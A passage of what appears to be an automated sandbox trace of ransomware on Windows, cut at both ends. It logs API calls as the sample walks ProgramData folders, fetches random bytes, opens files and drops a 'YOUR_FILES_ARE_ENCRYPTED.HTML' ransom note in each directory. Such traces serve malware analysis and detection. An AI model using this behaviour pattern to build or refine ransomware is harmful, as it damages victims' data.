returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*" [0170.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1cb960, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1cb960, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.039] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 66 [0170.039] lstrcmpW (lpString1="WelcomeScan.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.039] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0170.039] lstrlenW (lpString=".jpg") returned 4 [0170.039] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0170.039] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0170.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0170.039] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.039] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.039] FindClose (in: hFindFile=0x42f31c0 | out: 
hFindFile=0x42f31c0) returned 1 [0170.039] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.040] GetProcessHeap () returned 0x270000 [0170.040] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.040] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0170.040] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.041] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.041] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0170.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.041] GetProcessHeap () returned 0x270000 [0170.041] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0170.047] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\WwanSvc") returned 40 [0170.048] GetProcessHeap () returned 0x270000 [0170.048] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0170.049] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc" [0170.049] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*" [0170.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1f1ac0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1f1ac0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.050] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned 49 [0170.050] GetProcessHeap () returned 0x270000 [0170.050] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.053] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" [0170.053] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*") 
returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*" [0170.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.053] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.054] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.054] GetProcessHeap () returned 0x270000 [0170.055] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.055] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0170.055] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.055] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.055] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0170.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.055] GetProcessHeap () returned 0x270000 [0170.056] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0170.057] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0170.057] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.057] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0170.066] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0170.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.066] GetProcessHeap () returned 0x270000 [0170.068] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0170.072] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive") returned 41 [0170.072] GetProcessHeap () returned 0x270000 [0170.072] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.074] lstrcpyW (in: lpString1=0x74ea008, 
lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive" [0170.074] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\*" [0170.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc23dd80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0170.075] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup") returned 47 [0170.075] GetProcessHeap () returned 0x270000 [0170.075] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.076] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup" [0170.076] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*" [0170.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xcc217c20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc217c20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.076] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0170.076] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.076] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.076] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0170.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.077] GetProcessHeap () returned 0x270000 [0170.078] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.078] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0170.078] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.078] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0170.078] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0170.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.079] GetProcessHeap () returned 0x270000 [0170.080] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0170.080] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache") returned 36 [0170.080] GetProcessHeap () returned 0x270000 [0170.080] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.080] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache") returned="\\\\?\\C:\\Users\\All Users\\Package Cache" [0170.080] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*" [0170.080] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0170.080] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88") returned 77 [0170.080] GetProcessHeap () returned 0x270000 [0170.080] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.081] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88" [0170.081] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*" [0170.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb75910, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.081] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages") returned 86 [0170.081] GetProcessHeap () returned 0x270000 [0170.081] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.093] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages" [0170.093] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*" [0170.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.093] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.094] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, 
ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 1 [0170.094] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch") returned 92 [0170.095] GetProcessHeap () returned 0x270000 [0170.095] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.095] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch" [0170.096] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*" [0170.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.096] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.096] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc23dd80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 1 [0170.096] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86") returned 96 [0170.096] GetProcessHeap () returned 0x270000 [0170.096] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0170.098] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86" [0170.098] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", lpString2="\\*" 
